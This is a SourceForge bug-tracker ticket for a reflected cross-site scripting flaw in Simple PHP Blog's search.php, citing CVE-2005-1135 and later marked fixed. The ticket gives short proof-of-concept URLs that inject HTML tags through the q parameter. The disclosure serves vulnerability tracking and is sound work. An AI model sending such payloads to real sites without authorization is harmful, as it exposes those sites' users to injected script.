Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office.

Close

#224 XSS in search.php

closed-fixed
nabber00
Security (24)
7
2011-12-13
2010-08-15
nabber00
No

http://Url/sphpblog/search.php?q=\[XSS]

http://\[Url]/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E
http://\[URl]/sphpblog/search.php?q=<a href=http://echo.or.id>echo</a>

Source: http://seclists.org/bugtraq/2005/Apr/232

Discussion

  • nabber00
    nabber00
    2010-08-15

    • status: open --> open-accepted
     
  • nabber00
    nabber00
    2010-08-15

    • status: open-accepted --> closed-invalid
     
  • nabber00
    nabber00
    2010-08-15

    I wasn't able to duplicate this in the current version

     
  • nabber00
    nabber00
    2011-12-13

    This is CVE-2005-1135.

     
  • nabber00
    nabber00
    2011-12-13

    • status: closed-invalid --> open-invalid
     
  • nabber00
    nabber00
    2011-12-13

    • status: open-invalid --> closed-fixed